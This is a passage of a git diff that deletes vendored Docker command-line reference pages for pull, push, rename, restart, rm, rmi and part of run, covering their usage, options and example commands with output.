-41d50ecd2f57        com.docker.swarm.node=fedora,com.docker.swarm.cpu=3,com.docker.swarm.storage=ssd
-```
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/pull.md b/vendor/github.com/docker/docker/docs/reference/commandline/pull.md
deleted file mode 100644
index 0c960b404a..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/pull.md
+++ /dev/null
@@ -1,252 +0,0 @@
----
-title: "pull"
-description: "The pull command description and usage"
-keywords: "pull, image, hub, docker"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# pull
-
-```markdown
-Usage:  docker pull [OPTIONS] NAME[:TAG|@DIGEST]
-
-Pull an image or a repository from a registry
-
-Options:
-  -a, --all-tags                Download all tagged images in the repository
-      --disable-content-trust   Skip image verification (default true)
-      --help                    Print usage
-```
-
-Most of your images will be created on top of a base image from the
-[Docker Hub](https://hub.docker.com) registry.
-
-[Docker Hub](https://hub.docker.com) contains many pre-built images that you
-can `pull` and try without needing to define and configure your own.
-
-To download a particular image, or set of images (i.e., a repository),
-use `docker pull`.
-
-## Proxy configuration
-
-If you are behind an HTTP proxy server, for example in corporate settings,
-before open a connect to registry, you may need to configure the Docker
-daemon's proxy settings, using the `HTTP_PROXY`, `HTTPS_PROXY`, and `NO_PROXY`
-environment variables. To set these environment variables on a host using
-`systemd`, refer to the [control and configure Docker with systemd](https://docs.docker.com/engine/admin/systemd/#http-proxy)
-for variables configuration.
-
-## Concurrent downloads
-
-By default the Docker daemon will pull three layers of an image at a time.
-If you are on a low bandwidth connection this may cause timeout issues and you may want to lower
-this via the `--max-concurrent-downloads` daemon option. See the
-[daemon documentation](dockerd.md) for more details.
-
-## Examples
-
-### Pull an image from Docker Hub
-
-To download a particular image, or set of images (i.e., a repository), use
-`docker pull`. If no tag is provided, Docker Engine uses the `:latest` tag as a
-default. This command pulls the `debian:latest` image:
-
-```bash
-$ docker pull debian
-
-Using default tag: latest
-latest: Pulling from library/debian
-fdd5d7827f33: Pull complete
-a3ed95caeb02: Pull complete
-Digest: sha256:e7d38b3517548a1c71e41bffe9c8ae6d6d29546ce46bf62159837aad072c90aa
-Status: Downloaded newer image for debian:latest
-```
-
-Docker images can consist of multiple layers. In the example above, the image
-consists of two layers; `fdd5d7827f33` and `a3ed95caeb02`.
-
-Layers can be reused by images. For example, the `debian:jessie` image shares
-both layers with `debian:latest`. Pulling the `debian:jessie` image therefore
-only pulls its metadata, but not its layers, because all layers are already
-present locally:
-
-```bash
-$ docker pull debian:jessie
-
-jessie: Pulling from library/debian
-fdd5d7827f33: Already exists
-a3ed95caeb02: Already exists
-Digest: sha256:a9c958be96d7d40df920e7041608f2f017af81800ca5ad23e327bc402626b58e
-Status: Downloaded newer image for debian:jessie
-```
-
-To see which images are present locally, use the [`docker images`](images.md)
-command:
-
-```bash
-$ docker images
-
-REPOSITORY   TAG      IMAGE ID        CREATED      SIZE
-debian       jessie   f50f9524513f    5 days ago   125.1 MB
-debian       latest   f50f9524513f    5 days ago   125.1 MB
-```
-
-Docker uses a content-addressable image store, and the image ID is a SHA256
-digest covering the image's configuration and layers. In the example above,
-`debian:jessie` and `debian:latest` have the same image ID because they are
-actually the *same* image tagged with different names. Because they are the
-same image, their layers are stored only once and do not consume extra disk
-space.
-
-For more information about images, layers, and the content-addressable store,
-refer to [understand images, containers, and storage drivers](https://docs.docker.com/engine/userguide/storagedriver/imagesandcontainers/).
-
-
-## Pull an image by digest (immutable identifier)
-
-So far, you've pulled images by their name (and "tag"). Using names and tags is
-a convenient way to work with images. When using tags, you can `docker pull` an
-image again to make sure you have the most up-to-date version of that image.
-For example, `docker pull ubuntu:14.04` pulls the latest version of the Ubuntu
-14.04 image.
-
-In some cases you don't want images to be updated to newer versions, but prefer
-to use a fixed version of an image. Docker enables you to pull an image by its
-*digest*. When pulling an image by digest, you specify *exactly* which version
-of an image to pull. Doing so, allows you to "pin" an image to that version,
-and guarantee that the image you're using is always the same.
-
-To know the digest of an image, pull the image first. Let's pull the latest
-`ubuntu:14.04` image from Docker Hub:
-
-```bash
-$ docker pull ubuntu:14.04
-
-14.04: Pulling from library/ubuntu
-5a132a7e7af1: Pull complete
-fd2731e4c50c: Pull complete
-28a2f68d1120: Pull complete
-a3ed95caeb02: Pull complete
-Digest: sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2
-Status: Downloaded newer image for ubuntu:14.04
-```
-
-Docker prints the digest of the image after the pull has finished. In the example
-above, the digest of the image is:
-
-    sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2
-
-Docker also prints the digest of an image when *pushing* to a registry. This
-may be useful if you want to pin to a version of the image you just pushed.
-
-A digest takes the place of the tag when pulling an image, for example, to
-pull the above image by digest, run the following command:
-
-```bash
-$ docker pull ubuntu@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2
-
-sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2: Pulling from library/ubuntu
-5a132a7e7af1: Already exists
-fd2731e4c50c: Already exists
-28a2f68d1120: Already exists
-a3ed95caeb02: Already exists
-Digest: sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2
-Status: Downloaded newer image for ubuntu@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2
-```
-
-Digest can also be used in the `FROM` of a Dockerfile, for example:
-
-```Dockerfile
-FROM ubuntu@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2
-MAINTAINER some maintainer <maintainer@example.com>
-```
-
-> **Note**: Using this feature "pins" an image to a specific version in time.
-> Docker will therefore not pull updated versions of an image, which may include
-> security updates. If you want to pull an updated image, you need to change the
-> digest accordingly.
-
-
-## Pulling from a different registry
-
-By default, `docker pull` pulls images from [Docker Hub](https://hub.docker.com). It is also possible to
-manually specify the path of a registry to pull from. For example, if you have
-set up a local registry, you can specify its path to pull from it. A registry
-path is similar to a URL, but does not contain a protocol specifier (`https://`).
-
-The following command pulls the `testing/test-image` image from a local registry
-listening on port 5000 (`myregistry.local:5000`):
-
-```bash
-$ docker pull myregistry.local:5000/testing/test-image
-```
-
-Registry credentials are managed by [docker login](login.md).
-
-Docker uses the `https://` protocol to communicate with a registry, unless the
-registry is allowed to be accessed over an insecure connection. Refer to the
-[insecure registries](dockerd.md#insecure-registries) section for more information.
-
-
-## Pull a repository with multiple images
-
-By default, `docker pull` pulls a *single* image from the registry. A repository
-can contain multiple images. To pull all images from a repository, provide the
-`-a` (or `--all-tags`) option when using `docker pull`.
-
-This command pulls all images from the `fedora` repository:
-
-```bash
-$ docker pull --all-tags fedora
-
-Pulling repository fedora
-ad57ef8d78d7: Download complete
-105182bb5e8b: Download complete
-511136ea3c5a: Download complete
-73bd853d2ea5: Download complete
-....
-
-Status: Downloaded newer image for fedora
-```
-
-After the pull has completed use the `docker images` command to see the
-images that were pulled. The example below shows all the `fedora` images
-that are present locally:
-
-```bash
-$ docker images fedora
-
-REPOSITORY   TAG         IMAGE ID        CREATED      SIZE
-fedora       rawhide     ad57ef8d78d7    5 days ago   359.3 MB
-fedora       20          105182bb5e8b    5 days ago   372.7 MB
-fedora       heisenbug   105182bb5e8b    5 days ago   372.7 MB
-fedora       latest      105182bb5e8b    5 days ago   372.7 MB
-```
-
-## Canceling a pull
-
-Killing the `docker pull` process, for example by pressing `CTRL-c` while it is
-running in a terminal, will terminate the pull operation.
-
-```bash
-$ docker pull fedora
-
-Using default tag: latest
-latest: Pulling from library/fedora
-a3ed95caeb02: Pulling fs layer
-236608c7b546: Pulling fs layer
-^C
-```
-
-> **Note**: Technically, the Engine terminates a pull operation when the
-> connection between the Docker Engine daemon and the Docker Engine client
-> initiating the pull is lost. If the connection with the Engine daemon is
-> lost for other reasons than a manual interaction, the pull is also aborted.
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/push.md b/vendor/github.com/docker/docker/docs/reference/commandline/push.md
deleted file mode 100644
index e36fd026d1..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/push.md
+++ /dev/null
@@ -1,75 +0,0 @@
----
-title: "push"
-description: "The push command description and usage"
-keywords: "share, push, image"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# push
-
-```markdown
-Usage:  docker push [OPTIONS] NAME[:TAG]
-
-Push an image or a repository to a registry
-
-Options:
-      --disable-content-trust   Skip image verification (default true)
-      --help                    Print usage
-```
-
-Use `docker push` to share your images to the [Docker Hub](https://hub.docker.com)
-registry or to a self-hosted one.
-
-Refer to the [`docker tag`](tag.md) reference for more information about valid
-image and tag names.
-
-Killing the `docker push` process, for example by pressing `CTRL-c` while it is
-running in a terminal, terminates the push operation.
-
-Registry credentials are managed by [docker login](login.md).
-
-## Concurrent uploads
-
-By default the Docker daemon will push five layers of an image at a time.
-If you are on a low bandwidth connection this may cause timeout issues and you may want to lower
-this via the `--max-concurrent-uploads` daemon option. See the
-[daemon documentation](dockerd.md) for more details.
-
-## Examples
-
-### Pushing a new image to a registry
-
-First save the new image by finding the container ID (using [`docker ps`](ps.md))
-and then committing it to a new image name.  Note that only `a-z0-9-_.` are
-allowed when naming images:
-
-```bash
-$ docker commit c16378f943fe rhel-httpd
-```
-
-Now, push the image to the registry using the image ID. In this example the
-registry is on host named `registry-host` and listening on port `5000`. To do
-this, tag the image with the host name or IP address, and the port of the
-registry:
-
-```bash
-$ docker tag rhel-httpd registry-host:5000/myadmin/rhel-httpd
-$ docker push registry-host:5000/myadmin/rhel-httpd
-```
-
-Check that this worked by running:
-
-```bash
-$ docker images
-```
-
-You should see both `rhel-httpd` and `registry-host:5000/myadmin/rhel-httpd`
-listed.
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/rename.md b/vendor/github.com/docker/docker/docs/reference/commandline/rename.md
deleted file mode 100644
index be035f1ce4..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/rename.md
+++ /dev/null
@@ -1,27 +0,0 @@
----
-title: "rename"
-description: "The rename command description and usage"
-keywords: "rename, docker, container"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# rename
-
-```markdown
-Usage:  docker rename CONTAINER NEW_NAME
-
-Rename a container
-
-Options:
-      --help   Print usage
-```
-
-The `docker rename` command allows the container to be renamed to a different name.
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/restart.md b/vendor/github.com/docker/docker/docs/reference/commandline/restart.md
deleted file mode 100644
index 9f7ed00553..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/restart.md
+++ /dev/null
@@ -1,26 +0,0 @@
----
-title: "restart"
-description: "The restart command description and usage"
-keywords: "restart, container, Docker"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# restart
-
-```markdown
-Usage:  docker restart [OPTIONS] CONTAINER [CONTAINER...]
-
-Restart one or more containers
-
-Options:
-      --help       Print usage
-  -t, --time int   Seconds to wait for stop before killing the container (default 10)
-```
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/rm.md
deleted file mode 100644
index 1c3e795933..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/rm.md
+++ /dev/null
@@ -1,69 +0,0 @@
----
-title: "rm"
-description: "The rm command description and usage"
-keywords: "remove, Docker, container"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# rm
-
-```markdown
-Usage:  docker rm [OPTIONS] CONTAINER [CONTAINER...]
-
-Remove one or more containers
-
-Options:
-  -f, --force     Force the removal of a running container (uses SIGKILL)
-      --help      Print usage
-  -l, --link      Remove the specified link
-  -v, --volumes   Remove the volumes associated with the container
-```
-
-## Examples
-
-    $ docker rm /redis
-    /redis
-
-This will remove the container referenced under the link
-`/redis`.
-
-    $ docker rm --link /webapp/redis
-    /webapp/redis
-
-This will remove the underlying link between `/webapp` and the `/redis`
-containers removing all network communication.
-
-    $ docker rm --force redis
-    redis
-
-The main process inside the container referenced under the link `/redis` will receive
-`SIGKILL`, then the container will be removed.
-
-    $ docker rm $(docker ps -a -q)
-
-This command will delete all stopped containers. The command
-`docker ps -a -q` will return all existing container IDs and pass them to
-the `rm` command which will delete them. Any running containers will not be
-deleted.
-
-    $ docker rm -v redis
-    redis
-
-This command will remove the container and any volumes associated with it.
-Note that if a volume was specified with a name, it will not be removed.
-
-    $ docker create -v awesome:/foo -v /bar --name hello redis
-    hello
-    $ docker rm -v hello
-
-In this example, the volume for `/foo` will remain intact, but the volume for
-`/bar` will be removed. The same behavior holds for volumes inherited with
-`--volumes-from`.
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/rmi.md b/vendor/github.com/docker/docker/docs/reference/commandline/rmi.md
deleted file mode 100644
index 149b7635b6..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/rmi.md
+++ /dev/null
@@ -1,83 +0,0 @@
----
-title: "rmi"
-description: "The rmi command description and usage"
-keywords: "remove, image, Docker"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# rmi
-
-```markdown
-Usage:  docker rmi [OPTIONS] IMAGE [IMAGE...]
-
-Remove one or more images
-
-Options:
-  -f, --force      Force removal of the image
-      --help       Print usage
-      --no-prune   Do not delete untagged parents
-```
-
-You can remove an image using its short or long ID, its tag, or its digest. If
-an image has one or more tag referencing it, you must remove all of them before
-the image is removed. Digest references are removed automatically when an image
-is removed by tag.
-
-    $ docker images
-    REPOSITORY                TAG                 IMAGE ID            CREATED             SIZE
-    test1                     latest              fd484f19954f        23 seconds ago      7 B (virtual 4.964 MB)
-    test                      latest              fd484f19954f        23 seconds ago      7 B (virtual 4.964 MB)
-    test2                     latest              fd484f19954f        23 seconds ago      7 B (virtual 4.964 MB)
-
-    $ docker rmi fd484f19954f
-    Error: Conflict, cannot delete image fd484f19954f because it is tagged in multiple repositories, use -f to force
-    2013/12/11 05:47:16 Error: failed to remove one or more images
-
-    $ docker rmi test1
-    Untagged: test1:latest
-    $ docker rmi test2
-    Untagged: test2:latest
-
-    $ docker images
-    REPOSITORY                TAG                 IMAGE ID            CREATED             SIZE
-    test                      latest              fd484f19954f        23 seconds ago      7 B (virtual 4.964 MB)
-    $ docker rmi test
-    Untagged: test:latest
-    Deleted: fd484f19954f4920da7ff372b5067f5b7ddb2fd3830cecd17b96ea9e286ba5b8
-
-If you use the `-f` flag and specify the image's short or long ID, then this
-command untags and removes all images that match the specified ID.
-
-    $ docker images
-    REPOSITORY                TAG                 IMAGE ID            CREATED             SIZE
-    test1                     latest              fd484f19954f        23 seconds ago      7 B (virtual 4.964 MB)
-    test                      latest              fd484f19954f        23 seconds ago      7 B (virtual 4.964 MB)
-    test2                     latest              fd484f19954f        23 seconds ago      7 B (virtual 4.964 MB)
-
-    $ docker rmi -f fd484f19954f
-    Untagged: test1:latest
-    Untagged: test:latest
-    Untagged: test2:latest
-    Deleted: fd484f19954f4920da7ff372b5067f5b7ddb2fd3830cecd17b96ea9e286ba5b8
-
-An image pulled by digest has no tag associated with it:
-
-    $ docker images --digests
-    REPOSITORY                     TAG       DIGEST                                                                    IMAGE ID        CREATED         SIZE
-    localhost:5000/test/busybox    <none>    sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf   4986bf8c1536    9 weeks ago     2.43 MB
-
-To remove an image using its digest:
-
-    $ docker rmi localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf
-    Untagged: localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf
-    Deleted: 4986bf8c15363d1c5d15512d5266f8777bfba4974ac56e3270e7760f6f0a8125
-    Deleted: ea13149945cb6b1e746bf28032f02e9b5a793523481a0a18645fc77ad53c4ea2
-    Deleted: df7546f9f060a2268024c8a230d8639878585defcc1bc6f79d2728a13957871b
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/run.md b/vendor/github.com/docker/docker/docs/reference/commandline/run.md
deleted file mode 100644
index e57ba4bbea..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/run.md
+++ /dev/null
@@ -1,732 +0,0 @@
----
-title: "run"
-description: "The run command description and usage"
-keywords: "run, command, container"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# run
-
-```markdown
-Usage:  docker run [OPTIONS] IMAGE [COMMAND] [ARG...]
-
-Run a command in a new container
-
-Options:
-      --add-host value              Add a custom host-to-IP mapping (host:ip) (default [])
-  -a, --attach value                Attach to STDIN, STDOUT or STDERR (default [])
-      --blkio-weight value          Block IO (relative weight), between 10 and 1000
-      --blkio-weight-device value   Block IO weight (relative device weight) (default [])
-      --cap-add value               Add Linux capabilities (default [])
-      --cap-drop value              Drop Linux capabilities (default [])
-      --cgroup-parent string        Optional parent cgroup for the container
-      --cidfile string              Write the container ID to the file
-      --cpu-count int               The number of CPUs available for execution by the container.
-                                    Windows daemon only. On Windows Server containers, this is
-                                    approximated as a percentage of total CPU usage.
-      --cpu-percent int             Limit percentage of CPU available for execution
-                                    by the container. Windows daemon only.
-                                    The processor resource controls are mutually
-                                    exclusive, the order of precedence is CPUCount
-                                    first, then CPUShares, and CPUPercent last.
-      --cpu-period int              Limit CPU CFS (Completely Fair Scheduler) period
-      --cpu-quota int               Limit CPU CFS (Completely Fair Scheduler) quota
-  -c, --cpu-shares int              CPU shares (relative weight)
-      --cpus NanoCPUs               Number of CPUs (default 0.000)
-      --cpu-rt-period int           Limit the CPU real-time period in microseconds
-      --cpu-rt-runtime int          Limit the CPU real-time runtime in microseconds
-      --cpuset-cpus string          CPUs in which to allow execution (0-3, 0,1)
-      --cpuset-mems string          MEMs in which to allow execution (0-3, 0,1)
-  -d, --detach                      Run container in background and print container ID
-      --detach-keys string          Override the key sequence for detaching a container
-      --device value                Add a host device to the container (default [])
-      --device-read-bps value       Limit read rate (bytes per second) from a device (default [])
-      --device-read-iops value      Limit read rate (IO per second) from a device (default [])
-      --device-write-bps value      Limit write rate (bytes per second) to a device (default [])
-      --device-write-iops value     Limit write rate (IO per second) to a device (default [])
-      --disable-content-trust       Skip image verification (default true)
-      --dns value                   Set custom DNS servers (default [])
-      --dns-option value            Set DNS options (default [])
-      --dns-search value            Set custom DNS search domains (default [])
-      --entrypoint string           Overwrite the default ENTRYPOINT of the image
-  -e, --env value                   Set environment variables (default [])
-      --env-file value              Read in a file of environment variables (default [])
-      --expose value                Expose a port or a range of ports (default [])
-      --group-add value             Add additional groups to join (default [])
-      --health-cmd string           Command to run to check health
-      --health-interval duration    Time between running the check (ns|us|ms|s|m|h) (default 0s)
-      --health-retries int          Consecutive failures needed to report unhealthy
-      --health-timeout duration     Maximum time to allow one check to run (ns|us|ms|s|m|h) (default 0s)
-      --help                        Print usage
-  -h, --hostname string             Container host name
-      --init                        Run an init inside the container that forwards signals and reaps processes
-      --init-path string            Path to the docker-init binary
-  -i, --interactive                 Keep STDIN open even if not attached
-      --io-maxbandwidth string      Maximum IO bandwidth limit for the system drive (Windows only)
-                                    (Windows only). The format is `<number><unit>`.
-                                    Unit is optional and can be `b` (bytes per second),
-                                    `k` (kilobytes per second), `m` (megabytes per second),
-                                    or `g` (gigabytes per second). If you omit the unit,
-                                    the system uses bytes per second.
-                                    --io-maxbandwidth and --io-maxiops are mutually exclusive options.
-      --io-maxiops uint             Maximum IOps limit for the system drive (Windows only)
-      --ip string                   Container IPv4 address (e.g. 172.30.100.104)
-      --ip6 string                  Container IPv6 address (e.g. 2001:db8::33)
-      --ipc string                  IPC namespace to use
-      --isolation string            Container isolation technology
-      --kernel-memory string        Kernel memory limit
-  -l, --label value                 Set meta data on a container (default [])
-      --label-file value            Read in a line delimited file of labels (default [])
-      --link value                  Add link to another container (default [])
-      --link-local-ip value         Container IPv4/IPv6 link-local addresses (default [])
-      --log-driver string           Logging driver for the container
-      --log-opt value               Log driver options (default [])
-      --mac-address string          Container MAC address (e.g. 92:d0:c6:0a:29:33)
-  -m, --memory string               Memory limit
-      --memory-reservation string   Memory soft limit
-      --memory-swap string          Swap limit equal to memory plus swap: '-1' to enable unlimited swap
-      --memory-swappiness int       Tune container memory swappiness (0 to 100) (default -1)
-      --name string                 Assign a name to the container
-      --network-alias value         Add network-scoped alias for the container (default [])
-      --network string              Connect a container to a network
-                                    'bridge': create a network stack on the default Docker bridge
-                                    'none': no networking
-                                    'container:<name|id>': reuse another container's network stack
-                                    'host': use the Docker host network stack
-                                    '<network-name>|<network-id>': connect to a user-defined network
-      --no-healthcheck              Disable any container-specified HEALTHCHECK
-      --oom-kill-disable            Disable OOM Killer
-      --oom-score-adj int           Tune host's OOM preferences (-1000 to 1000)
-      --pid string                  PID namespace to use
-      --pids-limit int              Tune container pids limit (set -1 for unlimited)
-      --privileged                  Give extended privileges to this container
-  -p, --publish value               Publish a container's port(s) to the host (default [])
-  -P, --publish-all                 Publish all exposed ports to random ports
-      --read-only                   Mount the container's root filesystem as read only
-      --restart string              Restart policy to apply when a container exits (default "no")
-                                    Possible values are : no, on-failure[:max-retry], always, unless-stopped
-      --rm                          Automatically remove the container when it exits
-      --runtime string              Runtime to use for this container
-      --security-opt value          Security Options (default [])
-      --shm-size string             Size of /dev/shm, default value is 64MB.
-                                    The format is `<number><unit>`. `number` must be greater than `0`.
-                                    Unit is optional and can be `b` (bytes), `k` (kilobytes), `m` (megabytes),
-                                    or `g` (gigabytes). If you omit the unit, the system uses bytes.
-      --sig-proxy                   Proxy received signals to the process (default true)
-      --stop-signal string          Signal to stop a container, SIGTERM by default (default "SIGTERM")
-      --stop-timeout=10             Timeout (in seconds) to stop a container
-      --storage-opt value           Storage driver options for the container (default [])
-      --sysctl value                Sysctl options (default map[])
-      --tmpfs value                 Mount a tmpfs directory (default [])
-  -t, --tty                         Allocate a pseudo-TTY
-      --ulimit value                Ulimit options (default [])
-  -u, --user string                 Username or UID (format: <name|uid>[:<group|gid>])
-      --userns string               User namespace to use
-                                    'host': Use the Docker host user namespace
-                                    '': Use the Docker daemon user namespace specified by `--userns-remap` option.
-      --uts string                  UTS namespace to use
-  -v, --volume value                Bind mount a volume (default []). The format
-                                    is `[host-src:]container-dest[:<options>]`.
-                                    The comma-delimited `options` are [rw|ro],
-                                    [z|Z], [[r]shared|[r]slave|[r]private], and
-                                    [nocopy]. The 'host-src' is an absolute path
-                                    or a name value.
-      --volume-driver string        Optional volume driver for the container
-      --volumes-from value          Mount volumes from the specified container(s) (default [])
-  -w, --workdir string              Working directory inside the container
-```
-
-The `docker run` command first `creates` a writeable container layer over the
-specified image, and then `starts` it using the specified command. That is,
-`docker run` is equivalent to the API `/containers/create` then
-`/containers/(id)/start`. A stopped container can be restarted with all its
-previous changes intact using `docker start`. See `docker ps -a` to view a list
-of all containers.
-
-The `docker run` command can be used in combination with `docker commit` to
-[*change the command that a container runs*](commit.md). There is additional detailed information about `docker run` in the [Docker run reference](../run.md).
-
-For information on connecting a container to a network, see the ["*Docker network overview*"](https://docs.docker.com/engine/userguide/networking/).
-
-## Examples
-
-### Assign name and allocate pseudo-TTY (--name, -it)
-
-    $ docker run --name test -it debian
-    root@d6c0fe130dba:/# exit 13
-    $ echo $?
-    13
-    $ docker ps -a | grep test
-    d6c0fe130dba        debian:7            "/bin/bash"         26 seconds ago      Exited (13) 17 seconds ago                         test
-
-This example runs a container named `test` using the `debian:latest`
-image. The `-it` instructs Docker to allocate a pseudo-TTY connected to
-the container's stdin; creating an interactive `bash` shell in the container.
-In the example, the `bash` shell is quit by entering
-`exit 13`. This exit code is passed on to the caller of
-`docker run`, and is recorded in the `test` container's metadata.
-
-### Capture container ID (--cidfile)
-
-    $ docker run --cidfile /tmp/docker_test.cid ubuntu echo "test"
-
-This will create a container and print `test` to the console. The `cidfile`
-flag makes Docker attempt to create a new file and write the container ID to it.
-If the file exists already, Docker will return an error. Docker will close this
-file when `docker run` exits.
-
-### Full container capabilities (--privileged)
-
-    $ docker run -t -i --rm ubuntu bash
-    root@bc338942ef20:/# mount -t tmpfs none /mnt
-    mount: permission denied
-
-This will *not* work, because by default, most potentially dangerous kernel
-capabilities are dropped; including `cap_sys_admin` (which is required to mount
-filesystems). However, the `--privileged` flag will allow it to run:
-
-    $ docker run -t -i --privileged ubuntu bash
-    root@50e3f57e16e6:/# mount -t tmpfs none /mnt
-    root@50e3f57e16e6:/# df -h
-    Filesystem      Size  Used Avail Use% Mounted on
-    none            1.9G     0  1.9G   0% /mnt
-
-The `--privileged` flag gives *all* capabilities to the container, and it also
-lifts all the limitations enforced by the `device` cgroup controller. In other
-words, the container can then do almost everything that the host can do. This
-flag exists to allow special use-cases, like running Docker within Docker.
-
-### Set working directory (-w)
-
-    $ docker  run -w /path/to/dir/ -i -t  ubuntu pwd
-
-The `-w` lets the command being executed inside directory given, here
-`/path/to/dir/`. If the path does not exist it is created inside the container.
-
-### Set storage driver options per container
-
-    $ docker run -it --storage-opt size=120G fedora /bin/bash
-
-This (size) will allow to set the container rootfs size to 120G at creation time.
-This option is only available for the `devicemapper`, `btrfs`, `overlay2`,
-`windowsfilter` and `zfs` graph drivers.
-For the `devicemapper`, `btrfs`, `windowsfilter` and `zfs` graph drivers,
-user cannot pass a size less than the Default BaseFS Size.
-For the `overlay2` storage driver, the size option is only available if the
-backing fs is `xfs` and mounted with the `pquota` mount option.
-Under these conditions, user can pass any size less then the backing fs size.
-
-### Mount tmpfs (--tmpfs)
-
-    $ docker run -d --tmpfs /run:rw,noexec,nosuid,size=65536k my_image
-
-The `--tmpfs` flag mounts an empty tmpfs into the container with the `rw`,
-`noexec`, `nosuid`, `size=65536k` options.
-
-### Mount volume (-v, --read-only)
-
-    $ docker  run  -v `pwd`:`pwd` -w `pwd` -i -t  ubuntu pwd
-
-The `-v` flag mounts the current working directory into the container. The `-w`
-lets the command being executed inside the current working directory, by
-changing into the directory to the value returned by `pwd`. So this
-combination executes the command using the container, but inside the
-current working directory.
-
-    $ docker run -v /doesnt/exist:/foo -w /foo -i -t ubuntu bash
-
-When the host directory of a bind-mounted volume doesn't exist, Docker
-will automatically create this directory on the host for you. In the
-example above, Docker will create the `/doesnt/exist`
-folder before starting your container.
-
-    $ docker run --read-only -v /icanwrite busybox touch /icanwrite/here
-
-Volumes can be used in combination with `--read-only` to control where
-a container writes files. The `--read-only` flag mounts the container's root
-filesystem as read only prohibiting writes to locations other than the
-specified volumes for the container.
-
-    $ docker run -t -i -v /var/run/docker.sock:/var/run/docker.sock -v /path/to/static-docker-binary:/usr/bin/docker busybox sh
-
-By bind-mounting the docker unix socket and statically linked docker
-binary (refer to [get the linux binary](
-https://docs.docker.com/engine/installation/binaries/#/get-the-linux-binary)),
-you give the container the full access to create and manipulate the host's
-Docker daemon.
-
-On Windows, the paths must be specified using Windows-style semantics. 
-
-    PS C:\> docker run -v c:\foo:c:\dest microsoft/nanoserver cmd /s /c type c:\dest\somefile.txt
-    Contents of file
-	
-    PS C:\> docker run -v c:\foo:d: microsoft/nanoserver cmd /s /c type d:\somefile.txt
-    Contents of file
-
-The following examples will fail when using Windows-based containers, as the 
-destination of a volume or bind-mount inside the container must be one of: 
-a non-existing or empty directory; or a drive other than C:. Further, the source
-of a bind mount must be a local directory, not a file.
-
-    net use z: \\remotemachine\share
-    docker run -v z:\foo:c:\dest ...
-    docker run -v \\uncpath\to\directory:c:\dest ...
-    docker run -v c:\foo\somefile.txt:c:\dest ...
-    docker run -v c:\foo:c: ...
-    docker run -v c:\foo:c:\existing-directory-with-contents ...
-
-For in-depth information about volumes, refer to [manage data in containers](https://docs.docker.com/engine/tutorials/dockervolumes/)
-
-### Publish or expose port (-p, --expose)
-
-    $ docker run -p 127.0.0.1:80:8080 ubuntu bash
-
-This binds port `8080` of the container to port `80` on `127.0.0.1` of the host
-machine. The [Docker User
-Guide](https://docs.docker.com/engine/userguide/networking/default_network/dockerlinks/)
-explains in detail how to manipulate ports in Docker.
-
-    $ docker run --expose 80 ubuntu bash
-
-This exposes port `80` of the container without publishing the port to the host
-system's interfaces.
-
-### Set environment variables (-e, --env, --env-file)
-
-    $ docker run -e MYVAR1 --env MYVAR2=foo --env-file ./env.list ubuntu bash
-
